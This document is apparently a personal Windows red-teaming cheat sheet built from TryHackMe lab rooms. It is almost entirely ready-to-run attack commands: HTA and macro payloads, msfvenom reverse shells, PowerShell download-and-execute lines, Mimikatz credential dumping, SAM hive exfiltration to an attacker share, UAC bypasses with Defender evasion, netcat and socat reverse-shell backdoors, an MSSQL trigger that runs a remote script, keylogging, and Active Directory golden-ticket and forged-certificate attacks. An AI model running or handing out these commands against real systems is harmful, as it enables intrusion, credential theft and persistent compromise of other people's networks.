Windows Red Teaming related shit

Weaponization (try them out at THM)

vbs

sample payload

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),1,True

run

  wscript hello.vbs
  wsccript /e:VBScript payload.txt

hta

sample

<html>
<body>
<script>
	// var c= 'cmd.exe'
  var c = "powershell iwr -uri 'http://10.10.14.6/customshell.exe' -Outfile C:\\Windows\\Tasks\\a.exe;C:\\Windows\\Tasks\\a.exe -e cmd.exe"
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

generate payload

Serve hta with web server (eg. python)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o xxx.hta

metasploit create and serve hta

use exploit/windows/misc/hta_server

vbs

basic payload

Sub Document_Open()
  EXECUTE
End Sub

Sub AutoOpen()
  EXECUTE
End Sub

Sub EXECUTE()
   MsgBox ("Welcome to Weaponization Room!")
End Sub

Sub EXECUTE()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

msfvenom

Note: if using .doc files change Workbook_Open to Document_open If using excel, no changes needed

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba

powershell

With PowerCat

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c 10.10.10.10 -p 1337 -e cmd"

Enum

powershell

change keyboard layout

powershell -command "Set-WinUserLanguageList -Force 'fi-FI'"

check for antivirus/windows defender

wmic /namespace:\\root\securitycenter2 path antivirusproduct
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
Get-Service WinDefend
Get-MpComputerStatus | select RealTimeProtectionEnabled
Get-MpThreat

EDR checker

https://github.com/PwnDexter/SharpEDRChecker

check for firewall

Get-NetFirewallProfile | Format-Table Name, Enabled

disable firewall

Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Get-NetFirewallProfile | Format-Table Name, Enabled

firewall rules

Get-NetFirewallRule | select DisplayName, Enabled, Description
Get-NetFirewallRule | findStr "Rule-name"

Test connection

Test-NetConnection -ComputerName 127.0.0.1 -Port 80

EDR checkers

Invoke-EDRChecker SharpEDRChecker

network enum

netstat -na
arp -a
ipconfig
ipconfig /all

general

systeminfo
whoami /priv
whoami
whoami /groups

smb

net share

users

net user 
net group
net localgroup
net localgroup administrators

updates

wmic qfe get Caption, Description

Credentials

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
cat C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-AdUser -Filter * -Properties * | Select Name, Description

Credentials Mimikatz

sekurlsa::logonpasswords

If we get 0x00005 error then:

!processprotect /process:lsass.exe /remove
!+
sekurlsa::logonpasswords

Credential Manager

Note: https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1

vaultcmd /list
VaultCmd.exe /listproperties:"Web Credentials"
powershell -ex bypass
Import-Module Get-WebCredentials.ps1
Get-WebCredentials

Check stored creds

 cmdkey /list
 runas /savecred /user:THM.red\thm-local cmd.exe

LAPS

Check if exists

dir "C:\Program Files\LAPS\CSE"
Get-Command *AdmPwd*
Find-AdmPwdExtendedRights -Identity THMorg

active directory

Basic

Note: use run-tool to check MMC if rdp is available

systeminfo | findstr Domain
Get-ADUser -Filter *
Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM"
Get-ADUser -Filter * -SearchBase "OU=THM,DC=THMREDTEAM,DC=COM"
Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties * 
Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
Get-ADGroup -Identity Administrators -Server za.tryhackme.com
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com
Get-ADDomain -Server za.tryhackme.com

## Change password of user 
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)

dir \\za.tryhackme.com\SYSVOL\
net user /domain
net user zoe.marshall /domain
net group /domain
net group "Tier 1 Admins" /domain
net accounts /domain

Event Log / Sysmon

Get-EventLog -List
Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }
Get-Service | where-object {$_.DisplayName -like "*sysm*"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
findstr /si '<ProcessCreate onmatch="exclude">' C:\tools\*

applications / services

wmic product get name,version
Get-ChildItem -Hidden -Path C:\Users\xxx\Desktop\
net start
wmic service where "name like 'THM Service'" get Name,PathName
Get-Process -Name "thm-service"
netstat -noa |findstr "LISTENING" |findstr "PID"

dns zone transfer

nslookup
--> server 10.10.5.186
--> ls -d thmredteam.com

Priv esc

Good automation scripts (these can be noisy)

• https://github.com/bitsadmin/wesng
• https://github.com/itm4n/PrivescCheck
• https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
• multi/recon/local_exploit_suggester (metasploit

Files to check

• C:\Unattend.xml
• C:\Windows\Panther\Unattend.xml
• C:\Windows\Panther\Unattend\Unattend.xml
• C:\Windows\system32\sysprep.inf
• C:\Windows\system32\sysprep\sysprep.xml
• C:\ProgramData\McAfee\Agent\DB\ma.db
• %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Saved credentials

cmdkey /list
runas /savecred /user:admin cmd.exe
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

quick wins (ctf style)

Check for tasks and see if we can write on any of of their location

## List of tasks
schtasks
## Info about specific task (eg. pathname)
schtasks /query /tn vulntask /fo list /v
## Check write access
icacls c:\tasks\schtask.bat
## try to run task
schtasks /run /tn vulntask

Check AlwaysInstallElevated

IF both of these are set good to go

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.13.22 LPORT=LOCAL_PORT -f msi -o malicious.msi

Execute

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Services

If we can write to any location where service-executables are located, overwrite them and get a shell/session

Also, check for quotes on BINARY_PATH_NAME - property, if there are no quotes but spaces we can abuse this since space is argument separator

EG

BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Can be intercepted as

C:\MyPrograms\Disk arg1 arg2

and so on

Also, test accesschk if we can edit the service itself (check for SERVICE_ALL_ACCESS)

See config

sc qc apphostsvc

Edit config (might not have rights)

sc config THMService binPath= "C:\Users\thm-unpriv\Desktop\rev-svc.exe" obj= LocalSystem

Registry

On registry editor goto:

HKLM\SYSTEM\CurrentControlSet\Services\

Imagepath = Path to run ObjectName = runner

Check for permissions

icacls C:\PROGRA~2\SYSTEM~1\WService.exe

Generate service payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe-service -o rev-svc.exe

Overwrite service with our payload

cp C:\Users\thm-unpriv\Desktop\rev-svc.exe WService.exe

Give permissions to our new payload

icacls WService.exe /grant Everyone:F

Restart our service if we can

## On cmd.exe
sc stop windowsscheduler
sc start windowsscheduler

Privilege abusing

Check with

whoami /priv

SeBackupPrivilege / SeRestorePrivilege

First cp hive files:

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

Send them to attacker host (eg smb)

copy C:\Users\THMBackup\sam.hive \\10.11.23.111\public\
copy C:\Users\THMBackup\system.hive \\10.11.23.111\public\

Use impacket’s secretsdump to dump hashes

secretsdump.py  -sam sam.hive -system system.hive LOCAL

Use hashes (eg. psexec from Impacket)

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.121.162

SeTakeOwnership

Abuse Utilman.exe

Take control

takeown /f C:\Windows\System32\Utilman.exe

Give privilege to yourself

icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

Rewrite Utilman

copy cmd.exe utilman.exe

After these steps lock your computer and press Ease of access button!

SeImpersonate

There is alot exploits for these, could use JuicyPotato or RoguePotato

Unpatched Software

Check installed products

wmic product get name,version,vendor

Find for CVE:s online

Pivoting

Running commands as another user

PSExec

Note: This is a Windows tool and can be downloaded here. Note2: Administrator account usually needed. Ports: 445 (SMB)

psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

WinRS

When WinRM is enabled Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

Powershell

Note: you can send files like this. This uploads to C:\Windows -folder

smbclient -c 'put myinstaller.msi' -U username -W ZA '//thmiis.za.tryhackme.com/admin$/' password
 putting file myinstaller.msi as \myinstaller.msi

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

After that

Enter-PSSession -Computername TARGET -Credential $credential

OR

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

WMI

$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}

INSTALL MSI

Generate with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=lateralmovement LPORT=4445 -f msi > bolainstaller.msi

INSTALL:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

WMI (LEGACY)

wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" 

sc

Ports: 135/TCP, 49152-65535/TCP (DCE/RPC) 445/TCP (RPC over SMB Named Pipes) 139/TCP (RPC over SMB Named Pipes)

Administrator required

Note: sc doesn’t work with SSH, spawn another shell (eg netcat) before using this

Start:

sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET start THMservice

Shut down:

sc.exe \\TARGET stop THMservice
sc.exe \\TARGET delete THMservice

scheduled tasks

Same restrictions as sc

To start:

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 

schtasks /s TARGET /run /TN "THMtask1" 

To shutdown:

schtasks /S TARGET /TN "THMtask1" /DELETE /F

UAC BYPASS

Automatic script

Note: Akagi https://github.com/hfiref0x/UACME

Via fodhelper.exe

Note: Defender blocks this

Get a reverse shell

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f
fodhelper.exe

Defender bypass 1 (be fast, unreliable)

Works the same, but in the end it adds a query which slows down windows defender a bit

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
## THIS 
reg add %REG_KEY% /d %CMD% /f & reg query %REG_KEY%
fodhelper.exe
## OR THIS
 reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

Cleanup

reg delete HKCU\Software\Classes\ms-settings\ /f

Defender bypass 2 (cmd.exe)

Execute

set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.10.224.43:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe

Cleanup

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

Scheduled tasks and env variables

Execute

reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4446 EXEC:cmd.exe,pipes &REM " /f

Cleanup

reg delete "HKCU\Environment" /v "windir" /f

Persistence

Also check out:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md

Add user to admin group

net localgroup administrators thmuser0 /add

Add to Backup Operators group

Note: Backup operators can read any file on machine which essentially means admin access, also adding to Remote Management Users group so we can RDP and WinRM. Also, UAC makes some restrictions when logging in remotely so update a register key

Setup

net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

After login (using Evil-WinRM )

Get sam & system files

reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak

Dump hashes

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Special privileges

We basically add SeBackupPrivilege and SeRestorePrivilege to our account

Export current config for editing

secedit /export /cfg config.inf
notepad config.inf

Add our username to SeBackupPrivilege and SeRestorePrivilege lines

Note: using username is fine

Import our new config

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

Modify WinRM service so we can login via WinRm

Add our user and give it full control via UI.

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

RID Hijacking

We basically update registry values in a way that system thinks we are administrator

Find RID for our user

Note: RID is last number set after last - of the SID

wmic useraccount get name,sid

Edit our registry value

Note: PsExec64 needed

Open Registry Editor

PsExec64.exe -i -s regedit

Navigate to correct folder

Note: RID here is hex-presentation of our previously found RID

HKLM\SAM\SAM\Domains\Account\Users\RID

Edit F value

Find RID value from registry and change it to F4 01 (500 in decimal)

Now we can login via RDP

Backdoors via files

Replace commonly used program (eg. putty.exe) with tampered version:

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Edit shortcut to execute mal program

Create a small script to execute wanted program with our backdoor

Store in Windows/System32/backdoor.ps1 for example

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe IP 4445"

C:\Windows\System32\calc.exe

Edit shortcut target

Note: you may need to update the icon after this to be more sneaky.

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Hijacking file associations

Basically this way we can get our backdoor to get executed everytime a certain file extension is opened!

Sample backdoor file

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

Find extenions prog id in registry editor

Note: .txt is example

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.txt

The ProgID is (Default)-fields Data-value

Find shell command of the ProgId in registry editor

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\{PROGID}

Change shell/open/command entry to execute our backdoor

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Services create

Generate service executable (eg with msfvenom)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

Create service and start it

sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

Service modify

The plan is to find a stopped service that has START_TYPE automatic, SERVICE_START_NAME is the user account which service runs on

Find a stopped service

sc.exe query state=all

See service properties

sc.exe qc THMService3

Edit service

sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"

Scheduled tasks

Create task

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.10.90.206 4449" /ru SYSTEM

Make task invisible

Edit registery value

Location:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{TASKNAME}

Delete SD-value

Execute on user logon

Add new REG_EXPAND_SZ registry field in one of these, set Data to be path to your executable

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

OR append UserInit or Shell registry on

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\

OR add new regsitry “UserInitMprLogonScript” ON

HKCU\Environment

MSSQL

On MSSQL session execute queries:

sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

After:

USE master

GRANT IMPERSONATE ON LOGIN::sa to [Public];

Configure trigger

USE HRDB
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://10.10.117.195:8000/evilscript.ps1'')"';

After all that, insert record to database and shell will execute!

Powershell disabled

Use https://github.com/Mr-Un1k0d3r/PowerLessShell.git

Generate payload

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=IP LPORT=4443 -f psh-reflection > liv0ff.ps1

Metasploit 1 liner for listener

msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost ip;set lport 4443;exploit"

Generate final payload

python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

Use Msbuild to build payload

MSBuild.exe liv0ff.csproj

Exploiting AD

Constrained delegation

Check if anyone can delegate anything

Get-NetUser -TrustedToAuth

Get hash/password of the user who can delegate

mimikatz.exe
token::elevate
lsadump::secrets

Use kekeo to generate tickets

kekeo.exe
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:ADD_PASSWORD_HERE
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

re enter mimikatz and use tickets

kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
exit 
klist (optional)

Enter into a new session with the ticket we just generated

Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

Automatic relays (Printer bug)

We need:

• A valid set of AD account credentials.
• Network connectivity to the target’s SMB service.
• The target host must be running the Print Spooler service.
• The hosts must not have SMB signing enforced.

Check for machine accounts (BLoodhound Query)

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

Check for Print Spooler

Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
## OR 
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

Check for SMB signing

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc

Exploit

python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"OWNED-TARGET-IP" -debug

SpoolSample.exe TARGET-DOMAIN-NAME "Attacker IP"

python3.9 ntlmrelayx.py -smb2support -t smb://"OWNED-TARGET-IP" -c 'whoami /all' -debug

Exploit users (keylogger)

Note: sometimes it’s good idea to move to less privileged users instead of sticking to admin

Also, we’ll be using metasploit modules for this

Find processes that user is running

ps | grep "explorer"

Migrate to process

migrate <PID>

Start keylogger

keyscan_start

Exploit GPO

Check access via Bloodhound, you can use mmc tool via RDP to access and edit GPOs

https://tryhackme.com/room/exploitingad

Inter-Realm TGTs

DOMAIN ADMIN REQUIRED

We need:

• The KRBTGT password hash
• The FQDN of the domain
• The username of the account we want to impersonate
• The Security Identifier (SID) of the domain

KRBTGT password hash

mimikatz.exe
lsadump::dcsync /user:DOMAIN\krbtgt

FQDN = fully qualified domain name

Username we can decide, domain/enterprise admin preferred

Sid of the domain

Get-ADComputer -Identity "THMDC"
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc

Request ticket

kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt

Persistence

Certificates (don’t do this)

We basically create a certificate on the domain which we can use to request TGTs, basically letting us do whatever we want

Extract private key

Check certificates

Check if Issuer is the current Domain

mimikatz.exe
crypto::certificates /systemstore:local_machine

Make keys exportable by patching

mimikatz.exe
privilege::debug
crypto::capi
crypto::cng

Export

mimikatz.exe
crypto::certificates /systemstore:local_machine /export

Generate our own certificate with private key

ForgeCert.exe
 --CaCertPath ./cert.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAl
tName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPasswo
rd Password123

Verify our certificate

Rubeus.exe asktgt /user
:Administrator /enctype:aes256 /certificate:fullAdmin.pfx /password:Password123 
/outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.61.101

Authenticate

kerberos::ptt administrator.kirbi

SID History

Basically this makes low priv user a Domain Admin

Check SID history of user

Get-ADUser phillip.wilkins -properties sidhistory,memberof

Get SID of the Domain Admins

Get-ADGroup "Domain Admins"

Patch history

Stop-Service -Name ntds -force 
Add-ADDBSidHistory -SamAccountName 'phillip.wilkins' -SidHistory 'S-1-5-21-3885271727-2693558621-2658995185-512' -DatabasePath C:\Windows\NTDS\ntds.dit 
Start-Service -Name ntds

Group Memberships

Create nested ADGroup

New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Net Group 1" -SamAccountName "<username>_nestgroup1" -DisplayName "<username> Nest Group 1" -GroupScope Global -GroupCategory Security
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Net Group 2" -SamAccountName "<username>_nestgroup2" -DisplayName "<username> Nest Group 2" -GroupScope Global -GroupCategory Security 

Add last group to domain admins group

Add-ADGroupMember -Identity "<username>_nestgroup2" -Members "<username>_nestgroup1"
Add-ADGroupMember -Identity "Domain Admins" -Members "<username>_nestgroup2"

Add user to the first group

Add-ADGroupMember -Identity "<username>_nestgroup1" -Members "<low privileged username>"

Check that it worked:

Get-ADGroupMember -Identity "Domain Admins"